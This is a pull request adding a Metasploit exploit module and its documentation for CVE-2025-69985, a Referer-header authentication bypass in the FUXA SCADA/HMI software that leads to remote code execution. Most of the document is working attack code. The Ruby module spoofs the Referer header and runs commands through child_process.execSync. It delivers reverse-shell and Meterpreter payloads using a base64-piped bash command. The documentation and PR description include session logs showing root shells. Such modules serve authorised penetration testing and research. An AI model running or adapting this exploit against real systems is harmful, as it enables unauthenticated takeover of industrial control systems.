### PR TITLE
FUXA SCADA/HMI Referer Authentication Bypass to RCE (CVE-2025-69985)

### DIFF
--- a/documentation/modules/exploit/multi/http/fuxa_scada_referer_rce.md
+++ b/documentation/modules/exploit/multi/http/fuxa_scada_referer_rce.md
@@ -1,0 +1,106 @@
+# Vulnerable Application
+
+[FUXA](https://github.com/frangoteam/FUXA) is an open-source SCADA/HMI web
+application. Versions 1.2.8 and prior contain an authentication bypass vulnerability
+in the `requireAuth` middleware (`jwt-helper.js`) that trusts the HTTP `Referer`
+header for internal request validation (CVE-2025-69985).
+
+By spoofing the `Referer` header, an unauthenticated attacker bypasses JWT
+authentication entirely and reaches the `/api/runscript` endpoint. This endpoint
+compiles and executes arbitrary JavaScript via Node.js `Module._compile()`, providing
+full OS command execution via `child_process.execSync()` — typically as root in
+Docker deployments.
+
+Three bypass methods exist:
+- **host** — `Referer` matches `http://<Host header>/fuxa` (most reliable)
+- **pattern** — `Referer` contains `/fuxa` from any origin
+- **local** — `Referer` contains `localhost:` (substring match)
+
+This is an incomplete fix for CVE-2023-33831. No patched version is available as of
+FUXA v1.2.11.
+
+**Affected versions:** FUXA <= 1.2.8 (and through v1.2.11)
+
+### Installing a vulnerable lab environment
+
+```bash
+# https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-69985
+docker compose up -d
+# FUXA UI available at http://localhost:1881
+```
+
+Or use the official Docker image:
+
+```bash
+docker run -d -p 1881:1881 frangoteam/fuxa:latest
+```
+
+## Verification Steps
+
+1. Start the vulnerable FUXA instance (port 1881 by default).
+2. Start `msfconsole`.
+3. Do: `use exploit/multi/http/fuxa_scada_referer_rce`
+4. Do: `set RHOSTS <target_ip>`
+5. Do: `check` — should return `Vulnerable` if unauthenticated script execution is confirmed via `(1337+42) == 1379`.
+6. Do: `run` — should open a shell session, typically as root.
+7. Verify with `id` and `hostname` in the session.
+
+## Options
+
+| Option | Default | Description |
+|--------|---------|-------------|
+| `BYPASS_METHOD` | `host` | Referer header bypass method. `host` constructs a Referer matching the target's Host header (most reliable). `pattern` uses any origin with a `/fuxa` path. `local` uses a `localhost:` URL. All three bypass JWT verification entirely. |
+
+## Scenarios
+
+### FUXA 1.2.8 on Debian 12 — Unix Command target
+
+```
+msf6 > use exploit/multi/http/fuxa_scada_referer_rce
+
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > check
+[+] 192.168.56.101:1881 - The target is vulnerable. Unauthenticated script execution confirmed via Referer bypass.
+
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:1881 - Executing cmd/unix/reverse_bash (Unix Command)
+[+] 192.168.56.101:1881 - Payload delivered via FUXA /api/runscript JavaScript exec
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:39812) at 2026-02-24 09:11:07 +0000
+
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+hostname
+fuxa
+uname -a
+Linux fuxa 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### FUXA 1.2.8 on Debian 12 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/http/fuxa_scada_referer_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:1881 - Executing linux/x64/meterpreter/reverse_tcp (Linux Dropper)
+[+] 192.168.56.101:1881 - Payload delivered via FUXA /api/runscript JavaScript exec
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:39944) at 2026-02-24 09:14:22 +0000
+
+meterpreter > getuid
+Server username: root @ fuxa
+meterpreter > sysinfo
+Computer     : fuxa
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/http/fuxa_scada_referer_rce.rb
+++ b/modules/exploits/multi/http/fuxa_scada_referer_rce.rb
@@ -42,14 +42,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2025-69985'],
           ['CWE', '288'],
-          ['URL', 'https://github.com/advisories/GHSA-4r4r-4jp4-wwf9'],
+          ['GHSA', '4r4r-4jp4-wwf9'],
           ['URL', 'https://gist.github.com/lihy10/8cb2dd65ebf1385f12a7e00e25a50d40'],
           ['URL', 'https://github.com/joshuavanderpoll/CVE-2025-69985'],
           ['URL', 'https://github.com/frangoteam/FUXA'],
           ['URL', 'https://exploit-intel.com/vuln/CVE-2025-69985'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-69985']
         ],
-        'DisclosureDate' => 'Feb 24, 2026',
+        'DisclosureDate' => '2026-02-24',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,

--- a/modules/exploits/multi/http/fuxa_scada_referer_rce.rb
+++ b/modules/exploits/multi/http/fuxa_scada_referer_rce.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -50,30 +49,18 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-69985']
         ],
         'DisclosureDate' => '2026-02-24',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'Linux/Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               'Type' => :cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'CmdStagerFlavor' => %i[printf echo],
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
               }
             }
           ]
@@ -118,16 +105,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
-    case target['Type']
-    when :cmd
-      if payload_instance.refname =~ /reverse|bind/
-        inner_b64 = Rex::Text.encode_base64(payload.encoded)
-        execute_command("echo #{inner_b64}|base64 -d|bash >/dev/null 2>&1 &")
-      else
-        execute_command(payload.encoded)
-      end
-    when :dropper
-      execute_cmdstager
+    if payload_instance.refname =~ /reverse|bind/
+      inner_b64 = Rex::Text.encode_base64(payload.encoded)
+      execute_command("echo #{inner_b64}|base64 -d|bash >/dev/null 2>&1 &")
+    else
+      execute_command(payload.encoded)
     end
 
     print_good('Payload delivered via FUXA /api/runscript JavaScript exec')

--- a/modules/exploits/multi/http/fuxa_scada_referer_rce.rb
+++ b/modules/exploits/multi/http/fuxa_scada_referer_rce.rb
@@ -1,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FUXA SCADA/HMI Referer Authentication Bypass to RCE',
+        'Description' => %q{
+          FUXA versions 1.2.8 and prior contain a critical authentication
+          bypass vulnerability in the requireAuth middleware (jwt-helper.js)
+          that trusts the HTTP Referer header for internal request validation.
+          By spoofing the Referer header, an unauthenticated attacker bypasses
+          JWT authentication and reaches the /api/runscript endpoint, which
+          compiles and executes arbitrary JavaScript via Node.js Module._compile().
+          This gives full OS command execution via child_process.execSync(),
+          typically as root in Docker deployments.
+
+          Three bypass methods exist: matching the server's Host header,
+          including a FUXA path pattern like /fuxa from any origin, or
+          including localhost: in the Referer. All bypass JWT verification
+          entirely. This vulnerability is an incomplete fix for CVE-2023-33831.
+
+          No patched version is available as of v1.2.11.
+        },
+        'Author' => [
+          'lihy10',                       # Original vulnerability research
+          'joshuavanderpoll',             # Public exploit
+          'Exploit Intelligence Platform' # MSF module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-69985'],
+          ['CWE', '288'],
+          ['URL', 'https://github.com/advisories/GHSA-4r4r-4jp4-wwf9'],
+          ['URL', 'https://gist.github.com/lihy10/8cb2dd65ebf1385f12a7e00e25a50d40'],
+          ['URL', 'https://github.com/joshuavanderpoll/CVE-2025-69985'],
+          ['URL', 'https://github.com/frangoteam/FUXA'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2025-69985'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-69985']
+        ],
+        'DisclosureDate' => 'Feb 24, 2026',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'CmdStagerFlavor' => %i[printf echo],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 1881,
+          'WfsDelay' => 30
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to FUXA', '/']),
+      OptEnum.new('BYPASS_METHOD', [true, 'Referer header bypass method', 'host', ['host', 'pattern', 'local']])
+    ])
+  end
+
+  def check
+    # Test auth bypass + script execution with a safe arithmetic expression.
+    # If the server evaluates (1337+42) and returns "1379", the bypass works
+    # and we have confirmed JavaScript execution.
+    res = send_runscript_request('return (1337+42).toString();', bypass: true)
+    return CheckCode::Unknown('Could not connect to target.') unless res
+
+    if res.code == 200 && res.body.include?('1379')
+      return CheckCode::Vulnerable('Unauthenticated script execution confirmed via Referer bypass.')
+    end
+
+    if res.code == 401
+      return CheckCode::Detected('FUXA API endpoint found but Referer authentication bypass failed.')
+    end
+
+    CheckCode::Safe("Target does not appear to be vulnerable (HTTP #{res.code}).")
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      if payload_instance.refname =~ /reverse|bind/
+        inner_b64 = Rex::Text.encode_base64(payload.encoded)
+        execute_command("echo #{inner_b64}|base64 -d|bash >/dev/null 2>&1 &")
+      else
+        execute_command(payload.encoded)
+      end
+    when :dropper
+      execute_cmdstager
+    end
+
+    print_good('Payload delivered via FUXA /api/runscript JavaScript exec')
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Base64-encode the command and decode it server-side via Node.js Buffer.
+    # This avoids issues with shell metacharacters (quotes, pipes, semicolons)
+    # that would break the JavaScript string literal or JSON encoding.
+    b64 = Rex::Text.encode_base64(cmd)
+    js_code = "const cp = require('child_process');" \
+              "return cp.execSync(Buffer.from('#{b64}', 'base64').toString()," \
+              " {encoding: 'utf8', timeout: 30000}).toString();"
+
+    vprint_status("Sending exploit payload (#{js_code.length} bytes)")
+
+    res = send_runscript_request(js_code, bypass: true)
+
+    unless res
+      if @first_request
+        fail_with(Failure::Unreachable, 'No response received from target.')
+      end
+      return
+    end
+
+    unless res.code == 200
+      if res.code == 401
+        fail_with(Failure::NoAccess, 'Authentication bypass failed (HTTP 401).')
+      end
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response: #{res.code}")
+    end
+
+    if @first_request
+      vprint_status("Payload chunk delivered (HTTP #{res.code})")
+      @first_request = false
+    end
+
+    # Extract and display command output if present (useful with cmd/unix/generic)
+    output = extract_output(res.body)
+    if output && !output.empty?
+      vprint_good("Command output:\n#{output}")
+    end
+
+    res
+  end
+
+  private
+
+  # Build the spoofed Referer header to bypass requireAuth JWT check.
+  #
+  # Three bypass vectors exist in jwt-helper.js:
+  #   'host'    - Referer matches http://<Host header>/ (most reliable)
+  #   'pattern' - Referer contains /fuxa (works from any origin)
+  #   'local'   - Referer contains localhost: (matches substring check)
+  def build_referer
+    case datastore['BYPASS_METHOD']
+    when 'host'
+      "http://#{rhost}:#{rport}/fuxa"
+    when 'pattern'
+      'http://attacker.example.com/fuxa'
+    when 'local'
+      'http://localhost:31337/'
+    end
+  end
+
+  # Send a POST request to /api/runscript with the given JavaScript code.
+  # The FUXA runTestScript handler compiles the code via Module._compile()
+  # and executes it with full Node.js API access.
+  def send_runscript_request(js_code, bypass: false)
+    @first_request = true if @first_request.nil?
+
+    json_body = {
+      params: {
+        script: {
+          test: true,
+          name: Rex::Text.rand_text_alpha(8),
+          code: js_code,
+          parameters: []
+        }
+      }
+    }.to_json
+
+    headers = {}
+    headers['Referer'] = build_referer if bypass
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'runscript'),
+      'ctype' => 'application/json',
+      'headers' => headers,
+      'data' => json_body
+    )
+  end
+
+  def extract_output(body)
+    return nil unless body
+
+    output = body.strip
+
+    # The response is often a JSON-encoded string (wrapped in double quotes).
+    # Parse it to get the raw string value.
+    if output.start_with?('"') && output.end_with?('"')
+      begin
+        output = JSON.parse(output)
+      rescue JSON::ParserError
+        # Not valid JSON - use raw value
+      end
+    end
+
+    output.to_s.strip
+  end
+end


### PR DESCRIPTION
## Summary
- FUXA versions 1.2.8 and prior contain an authentication bypass in `requireAuth` middleware (`jwt-helper.js`) that trusts the HTTP `Referer` header for internal request validation
- By spoofing `Referer` to match the server host, include `/fuxa`, or include `localhost:`, an unauthenticated attacker bypasses JWT verification entirely
- The `/api/runscript` endpoint compiles and executes arbitrary JavaScript via Node.js `Module._compile()` and `child_process.execSync()`, giving full OS command execution (typically as root in Docker deployments)

## Verification
Tested against FUXA 1.2.x / Debian GNU/Linux 12 (bookworm) (Docker lab):
```
msf6 exploit(cve_2025_69985_fuxa_referer_rce) > check
[+] 172.27.0.2:1881 - The target is vulnerable. Unauthenticated script execution confirmed via Referer bypass.

msf6 exploit(cve_2025_69985_fuxa_referer_rce) > run -z
[*] Started reverse TCP handler on 172.27.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Unauthenticated script execution confirmed via Referer bypass.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[+] Payload delivered via FUXA /api/runscript JavaScript exec
[*] Command shell session 1 opened (172.27.0.3:4444 -> 172.27.0.2:53606) at 2026-03-04 18:19:19 +0000
[*] Session 1 created in the background.

msf6 exploit(cve_2025_69985_fuxa_referer_rce) > sessions -c "id && hostname && uname -a && cat /etc/os-release | head -3" -i 1
[*] Running 'id && hostname && uname -a && cat /etc/os-release | head -3' on shell session 1 (172.27.0.2)
uid=0(root) gid=0(root) groups=0(root)
cve-2025-69985-vulnerable
Linux cve-2025-69985-vulnerable 6.12.69-linuxkit #1 SMP Mon Feb 16 11:19:06 UTC 2026 aarch64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
```

## Module details
- **Affected versions:** FUXA 1.2.8 and prior (no patch available as of v1.2.11)
- **Auth required:** None — Referer header bypass gives full access
- **Bypass methods:** `host` (Referer matches server Host), `pattern` (Referer contains /fuxa), `local` (Referer contains localhost:)
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** Yes — sends `return (1337+42).toString()` and checks for `1379` in response
- **Rank:** Excellent

## References
- https://github.com/advisories/GHSA-4r4r-4jp4-wwf9
- https://gist.github.com/lihy10/8cb2dd65ebf1385f12a7e00e25a50d40
- https://github.com/joshuavanderpoll/CVE-2025-69985
- https://exploit-intel.com/vuln/CVE-2025-69985
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-69985